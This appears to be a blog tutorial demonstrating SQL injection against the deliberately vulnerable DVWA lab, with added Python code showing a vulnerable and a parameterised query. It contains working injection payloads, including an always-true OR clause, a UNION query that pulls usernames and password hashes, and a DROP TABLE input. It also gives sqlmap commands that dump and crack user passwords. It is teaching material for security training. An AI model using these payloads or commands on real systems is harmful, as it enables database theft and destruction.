SQL Injection — Security

Raghavendra Hiremath
3 min read · May 1, 2021


Learn! Learn! Learn!

Hello Everyone, hope you all are doing well during this pandemic situation.

Today I bring an interesting topic that most of us have heard about in the security world.

NOTE: This is only for Education Purpose.

What is SQL Injection?

This is one of the most common web attack techniques. It can be used to read, modify or destroy data in your database and to steal useful information. Basically, the attacker submits input through a web page that the application pastes straight into a SQL query, so the input is interpreted as part of the query instead of as plain data.
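To make the mechanism concrete before the DEMO, here is a small added example (my own code, not part of the original post or of DVWA) that reproduces the DVWA "low" lookup, `SELECT first_name, last_name FROM users WHERE user_id = '$id'`, against an in-memory SQLite table. The sample users and hashes are constructed for this example. It shows the two classic payloads changing the query's meaning, the same payloads doing nothing against a parameterised query, and one caveat: the "destroy your database" half of the threat needs a driver that runs stacked statements, which Python's sqlite3 refuses.

```python
import sqlite3

# Constructed sample data (an assumption for this example): a DVWA-like "users"
# table. Passwords are stored as MD5 hashes, as DVWA does.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c4428cb38d5f260853678922e3"),
    (3, "Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
]

# Payloads an attacker would type into the id field instead of a number.
TAUTOLOGY = "' OR '1'='1"                                   # WHERE becomes always true
UNION_DUMP = "' UNION SELECT user, password FROM users-- "  # pulls other columns into the result
STACKED = "'; DROP TABLE users-- "                          # only works if the driver allows it


def make_db():
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_input):
    """The DVWA 'low' pattern: the input is concatenated into the SQL text,
    so quotes, OR, UNION and comment markers in it become SQL syntax."""
    query = (
        "SELECT first_name, last_name FROM users "
        f"WHERE user_id = '{user_input}'"
    )
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_input):
    """Same lookup with a bound parameter: the driver sends the value
    separately from the statement, so it can never change the query shape."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_input,)).fetchall()


def attempt_stacked(conn):
    """Try the DROP TABLE payload and report how many users survive.
    Python's sqlite3 executes one statement at a time and raises instead."""
    try:
        lookup_vulnerable(conn, STACKED)
    except (sqlite3.Warning, sqlite3.Error):
        pass  # "You can only execute one statement at a time."
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def run_demo():
    """Run every case against a fresh database and return the rows each produced."""
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "1"),             # the intended lookup
        "tautology": lookup_vulnerable(conn, TAUTOLOGY),    # every row comes back
        "union": sorted(lookup_vulnerable(conn, UNION_DUMP)),  # usernames + hashes
        "safe_tautology": lookup_safe(conn, TAUTOLOGY),     # nothing: treated as data
        "safe_union": lookup_safe(conn, UNION_DUMP),        # nothing: treated as data
    }


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(f"{name}: {rows}")
    print("users left after stacked payload:", attempt_stacked(make_db()))
```

The UNION payload is exactly what sqlmap automates later in the DEMO: it guesses the column count of the original SELECT, then appends its own SELECT over the tables it is interested in. Whether a stacked payload can also drop tables depends on the DBMS and the driver, not on the injection itself.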

To understand how it works, let’s get into the DEMO.

Pre-requisites:

1. Kali Linux (you can pick your own flavour, e.g. Parrot OS).
2. Burp Suite (https://portswigger.net/burp): a proxy-based tool to intercept traffic, identify and assess vulnerabilities, and perform hands-on testing.
3. DVWA (https://dvwa.co.uk/), Damn Vulnerable Web Application: a deliberately vulnerable application to practise on.

The vulnerable application, DVWA, is running on port 8883.

I have Burp Suite (Community Edition) running with its default proxy listener on my local machine, 127.0.0.1 port 8080.

IMPORTANT: Make sure your browser (IE/Firefox/Chrome) is configured to use that proxy, otherwise Burp will never see the request.

Click on SQL Injection

I will type "admin" in the input field so that I can capture the request in Burp Suite. As soon as you click Submit, you will see the GET request intercepted in Burp.

Important to note here: remove the user_token parameter and the series of cookies highlighted below. Do keep the PHPSESSID and security=low cookies, though: without a valid session DVWA redirects every request to login.php, and without security=low it falls back to the default security level from its config, so sqlmap would end up testing a page that is not vulnerable.

Now your request should look like the one below:

Click on Action > Copy to file. Save the file under any name; I'm saving it as "sql_injection.txt" for reference.

The file is now saved on Kali Linux; note the location where you stored it.

I'm using sqlmap, which parses the request details (method, URL, parameters, headers and cookies) from that txt file. Run the command below as-is in the terminal.

Answer Y and hit Enter whenever sqlmap prompts you.

The tool was able to identify the backend database and list the databases the application is connected to.

Now, let us pull all the details of the dvwa database. Run the command below.

You will see the list of user names and passwords of this application in a neat table. DVWA stores the passwords as MD5 hashes, and sqlmap will offer to crack them with its built-in dictionary attack when it dumps the table.
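The steps above edit the captured request by hand and then hand it to sqlmap. As an added example (my own code, not the author's or sqlmap's), here is a small parser for the raw request format Burp writes with "Copy to file": it extracts the GET parameters sqlmap will test, mirrors the manual trimming of user_token and extra cookies, flags the two cookies the DEMO depends on, and writes the request back out. The request text, host, session id and token values are constructed for this example; `ESSENTIAL_COOKIES`, `trim_for_replay` and `replay_checks` are my names, not anything from DVWA or sqlmap.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit

# Constructed sample (an assumption for this example): what Burp's "Copy to file"
# produces for the DVWA request, with made-up host, session id and token values.
SAMPLE_REQUEST = (
    "GET /vulnerabilities/sqli/?id=admin&Submit=Submit&user_token=deadbeef HTTP/1.1\r\n"
    "Host: 127.0.0.1:8883\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n"
    "Cookie: PHPSESSID=0123456789abcdef; security=low; _ga=GA1.1.1\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# The two cookies DVWA needs to serve the vulnerable page at the "low" level.
ESSENTIAL_COOKIES = {"PHPSESSID", "security"}


def parse_request(raw):
    """Split a raw HTTP request into method, path, query params, headers, cookies, body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    url = urlsplit(target)
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    cookies = {}
    cookie_header = next((v for k, v in headers.items() if k.lower() == "cookie"), "")
    for item in cookie_header.split(";"):
        name, _, value = item.strip().partition("=")
        if name:
            cookies[name] = value
    return {"method": method, "path": url.path, "params": params,
            "headers": headers, "cookies": cookies, "body": body}


def trim_for_replay(req):
    """Mirror the manual edit from the DEMO: drop user_token and every cookie
    DVWA does not need, keep the two it does."""
    params = {k: v for k, v in req["params"].items() if k != "user_token"}
    cookies = {k: v for k, v in req["cookies"].items() if k in ESSENTIAL_COOKIES}
    return {**req, "params": params, "cookies": cookies}


def replay_checks(req):
    """Problems that make sqlmap test the wrong page without saying so."""
    problems = []
    if "PHPSESSID" not in req["cookies"]:
        problems.append("no PHPSESSID cookie: DVWA will redirect to login.php")
    if req["cookies"].get("security") != "low":
        problems.append("security cookie is not 'low': DVWA uses its default level instead")
    return problems


def to_request_text(req):
    """Serialise back into the raw format that sqlmap reads from a request file."""
    target = req["path"]
    if req["params"]:
        target += "?" + urlencode(req["params"])
    lines = [f"{req['method']} {target} HTTP/1.1"]
    for name, value in req["headers"].items():
        if name.lower() == "cookie":
            value = "; ".join(f"{k}={v}" for k, v in req["cookies"].items())
        lines.append(f"{name}: {value}")
    return "\r\n".join(lines) + "\r\n\r\n" + req["body"]


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print("parameters sqlmap will test:", sorted(req["params"]))
    trimmed = trim_for_replay(req)
    print("checks on trimmed request:", replay_checks(trimmed) or "ok")
    print(to_request_text(trimmed))
```

The article's own sqlmap commands live in its screenshots; a typical invocation against the saved file (my wording, not necessarily the author's exact command) is `sqlmap -r sql_injection.txt --batch --dbs` to enumerate databases and `sqlmap -r sql_injection.txt --batch -D dvwa -T users --dump` for the users table. Running `replay_checks` on a request before handing it to sqlmap catches the most common reason a DVWA run "finds nothing": a session or security cookie that was trimmed away.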

Thank you everyone! Have a great day!
